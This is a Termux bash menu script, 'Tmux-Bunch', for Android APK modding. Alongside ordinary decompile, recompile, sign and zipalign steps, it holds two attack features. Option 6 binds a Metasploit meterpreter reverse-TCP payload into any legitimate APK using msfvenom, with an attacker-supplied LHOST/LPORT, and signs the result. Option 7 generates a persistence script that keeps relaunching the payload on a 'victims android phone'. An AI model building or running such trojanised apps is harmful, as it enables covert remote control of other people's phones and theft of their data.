#!/data/data/com.termux/files/usr/bin/bash
clear
unset LD_PRELOAD
dir=$HOME/Tmux-Bunch
if  [ $dir != $HOME/Tmux-Bunch ]
	then
		dir=$HOME/Tmux-Bunch
	fi
subs="which file ? Enter number of choice or 'x' to exit"
esit="are you sure ? press ENTER to exit"
return="ENTER to return to TMUX-BUNCH menu"
#DIRECTORY="/data/data/com.termux/files/usr/share/figlet"
TMP="Hax4Us(devil) Tmux-Bunch is a first tool for complete apk modding in TERMUX."
VERSION="VERSION 2.4"
#colors
cyan='\033[1;36m'
green='\033[1;32m'
red='\033[1;31m'
yellow='\033[1;33m'
blue='\033[1;34m'
purple='\033[1;35m'
reset='\033[0m'
#if [ ! -d "$DIRECTORY" ]; then
#apt update && apt upgrade
#fi
#figlet -f mini ..........TMUX-BUNCH..........
echo -e "$red               ┈┈┈╱▔▔▔▔▔▔▔▔╲┈┈┈  
               ┈┈┈▏┈┈┈┈┈┈┈┈▕┈┈┈
               ┈┈┈  ╭━╮┈┈╭━╮▕┈┈┈
                ╱▔╲╲╰━╯╱╲╰━╯╱╱▔╲
                ╲▂╲╲▏╮┈▔▔┈╭▕ ╲╲▂╱
                 ╱▔╲╲┣╋╋╋╋┫  ╲╲╲
               ╲▂╱┈╲▂▂▂▂▂▂╱┈╲▂╱"

echo
echo -e "$green              +_+_+_+_+_+_+_+_+_+_+"
echo -e "$blue                 Tmux-Bunch v2.4"
echo -e "$green               +_+_+_+_+_+_+_+_+_+_+"
echo
echo
echo -e "$purple ENTER to continue"
read garbage
echo -e "$cyan $TMP"
echo
echo " $VERSION"
echo
echo -e "$red   -----Hax4Us---Lokesh---Don't--CopY----"
echo
echo -e "$red WARNING :- Don't Try To Reupload , Modify , Or Resell Otherwise I Will Report You"
echo
echo -e "$green You Can Reuse Or Give My Tool To Anyone or users But You Will Have To Take Permission From Me"
echo
echo " --------------LICENSE--INCLUDED------------"
echo
echo -e "$yellow         ~~~~~~~~~TMUX---BUNCH~~~~~~~~~"
echo
echo -e "$blue                 APK MODDING          "
echo "---------------------------------------------"
echo
echo
echo -e "$red---------------------Lokesh------------------"
echo "---------------------------------------------"
echo -e "$cyan $TMP"
echo
echo " $VERSION"
echo "---------------------------------------------"
echo
echo -e "$green Place apps in 'decompiler' folder."
echo
echo -e "$purple ------------------------------------------"
echo
echo -e "$yellow 1)Install frameworks-important for recompiling!!"
echo " 2)Decompile apk"
echo " 3)Recompile"
echo " 4)Sign apk-important for installing"
echo " 5)Zipalign"
echo " 6)Bind payload with any apk"
echo " 7)Persistence Backdoor Script"
echo " 8)About"
echo " 9)Credits"
echo " 10)Exit"
echo
echo -e "$blue ______________________"
echo
echo -e "$purple pick your option$reset"
read k
case "$k" in
1) echo
echo
echo
echo -e "$red You must install the framework-res.apk"
echo " from the /system/frameworks folder of your device."
echo
echo -e "$green press ENTER to continue"
echo
read garbagee
cd $dir/frameworks
ls | cat -n
echo
echo -e "$yellow which file ? Enter number of choice or 'x' to exit"
read choice
if [ $choice = 'x' ] ; then
echo -e "$red are you sure ? press ENTER to exit"
read garbageee
exit
else
OUTPUT=`ls | sed -n $choice'p'`
sh $dir/.apktool if $dir/frameworks/$OUTPUT -p $dir
echo
echo
echo "_______________________"
echo
echo -e "$blue ENTER to return to TMUX-BUNCH menu$reset"
read l
fi
cd $dir
tmuxbunch ;;

2) echo
echo
echo -e "$yellow Decompiling an apk"
echo
echo -e "$green press ENTER to continue"
echo
read o
cd $dir/decompiler
ls | cat -n
echo
echo
echo -e "$blue $subs"
read choice
if [ $choice = 'x' ] ; then
echo -e "$red $esit"
read e
exit
else
cd $dir/decompiler
OUTPUT=`ls | sed -n $choice'p'`
sh $dir/.apktool d $dir/decompiler/$OUTPUT -o $dir/recompiler/$OUTPUT
echo
echo
echo
echo -e "$blue ____________________________________"
echo
echo -e "$yellow Decompiled files in 'recompiler' folder. You can now play with apk source code"
echo
echo -e "$green $return $reset"
read s
fi
cd $dir
tmuxbunch ;;

3) echo
echo
echo
echo -e "$yellow This will compile the source code"
echo " The app can't be install until you sign it"
echo
echo -e "$blue press ENTER to continue"
echo
read h
cd $dir/recompiler
ls | cat -n
echo
echo
echo -e "$yellow $subs"
read choice
if [ $choice = 'x' ]
then
echo -e "$red $esit"
read p
exit
else
OUTPUT=`ls | sed -n $choice'p'`
sh $dir/.apktool b --aapt $dir/.bunch/openjdk/bin/aapt $dir/recompiler/$OUTPUT -o $dir/unsign/$OUTPUT
echo
echo
echo
echo -e "$green ________________________________________"
echo
echo -e "$blue recompiled apk in 'unsign' folder. Sign apk before installing"
echo
echo -e "$red $return $reset"
read a
fi
cd $dir
tmuxbunch ;;

4) echo
echo
echo
echo -e "$yellow Sign the apk"
echo
echo " App will be ready to install after you sign it"
echo
echo -e "$greenpress ENTER to continue"
echo
read n
cd $dir/unsign
ls | cat -n
echo
echo
echo -e "$yellow $subs"
read choice
if [ $choice = 'x' ] ; then
echo -e "$red $esit"
read d
exit
else
echo -e "$green signing apk ......."
OUTPUT=`ls | sed -n $choice'p'`
sh $dir/.signapk publickey.x509.pem publickey.pk8 $dir/unsign/$OUTPUT $dir/sign/signed_$OUTPUT
echo
echo
echo -e "$blue _______________________________________"
echo
echo -e "$green signed apk in 'sign' folder"
echo
echo -e "$red $return $reset"
read lokesh
fi
cd $dir
tmuxbunch ;;

5) echo
echo
echo
echo -e "$yellow place apk to be zipaligned in 'Zipalign' folder"
echo
echo -e "$green press ENTER to continue"
read lokesh
cd $dir/zipalign
ls | cat -n
echo
echo
echo -e "$blue $subs"
read choice
if [ $choice = 'x'] ; then
echo -e "$red $esit"
read pandey
exit
else
OUTPUT=`ls | sed -n $choice'p'`
sh $dir/.zzipalign 4 $dir/zipalign/$OUTPUT $dir/zipaligned_$OUTPUT
echo
echo
echo -e "$blue________________________________________"
echo
echo -e "$yellow zipaligned apk in 'zipalign' folder"
echo
echo -e "$green $return $reset"
read devil
fi
cd $dir
tmuxbunch
;;

6) echo
echo -e "$red [*] Make sure , Metasploit is installed 📌"
echo
echo -e "$yellow [*] Please first move or copy your target apk file into binder folder 📩"
if [ ! -d $dir/binder ]
	then
		mkdir $dir/binder
		fi
echo
echo -e "$blue [*] Please wait ... 📡"
echo
cd $HOME/Tmux-Bunch/binder
ls | cat -n
echo
echo
echo -e "$yellow $subs"
read choice
if [[ $choice == "" ]]
	then
		echo -e "$red please enter valid choice\nSo please wait you are redirecting to Main Menu"
		sleep 3
		tmuxbunch
		fi
if [ $choice = 'x' ] ; then
echo -e "$red $esit"
read jaiho
exit
else
OUTPUT=`ls | sed -n $choice'p'`
mv $dir/binder/$OUTPUT $HOME/metasploit-framework
echo -e "$purple [*] Please enter following details :-"
echo " [*] LHOST :-"
read lhost
echo " [*] LPORT :-"
read lport
echo " [*] ENTER THE NAME YOU WANT TO GIVE FOR THE FINAL APP"
read output12
echo
echo -e "$blue [*] Please wait while binding.......🕜"
echo
cd $HOME/metasploit-framework
./msfvenom -x $OUTPUT -p android/meterpreter/reverse_tcp lhost=$lhost lport=$lport

echo -e "$green signing apk ......."
mv $dir/unsign/output.apk $dir/unsign/$output12.apk
sh $dir/.signapk publickey.x509.pem publickey.pk8 $dir/unsign/$output12.apk $dir/embout/$output12.apk
rm $dir/unsign/$output12.apk
fi
echo
echo -e "$cyan We will met again :D , have a payload day..! 📢"
echo
echo -e "$blue press ENTER for main menu$reset"
read continued
cd $dir
tmuxbunch
;;
7) echo 
echo
printf "#!/system/bin/sh\nwhile :\ndo am start --user 0 -a android.intent.action.MAIN -n com.metasploit.stage/.MainActivity\nsleep 20\ndone" > $HOME/Tmux-Bunch/shell/shell.sh

echo -e "$yellow Script Generated In Shell Folder Of Tmux-Bunch :)"
echo
echo -e "$red Now you can run this script into your victims android phone and make your session died free payload :) $reset"
;;
8) echo
echo
echo
echo -e "$yellow                         About"
echo -e "$green     ------------------------------------------"
echo
echo -e "$blue I am trying to do with this tool is provide a user friendly program for noobs so they can play with apks before they really understand the process.This tool is also useful for experienced users that don't want to type the same command again and again.And this tool can also give you a great feature of payload binding with any legit app :)"
echo
echo -e "$green ENTER to continue"
read continue
echo
echo
echo -e "$red----Creator Of This Script Or Tool ::--->> Lokesh (Hax4Us)---"
echo
#figlet -f mini ..........TMUX--BUNCH..........
echo
echo
echo -e "$blue          ~~~~~~~TMUX---BUNCH~~~~~~~~"
echo
echo -e "$green ENTER to continue$reset"
read devil
cd $dir
tmuxbunch
;;

9) echo -e "$yellow       ---------Credits Goes To----------"
echo
echo " 1)Openjdk Creators"
echo " 2)Apktool Creator(ibotpeaches)"
echo " 3)Great Tools (signapk , zipalign , apktool )"
echo " 4)LoKesh(Hax4Us) --- Collector/Script/Tool-Creator"
echo
echo -e "$green ENTER to continue$reset"
read devil
cd $dir
tmuxbunch
;;
10) echo -e "$blue Bye Bye..!!"
	echo -e "$reset"
exit
;;
esac
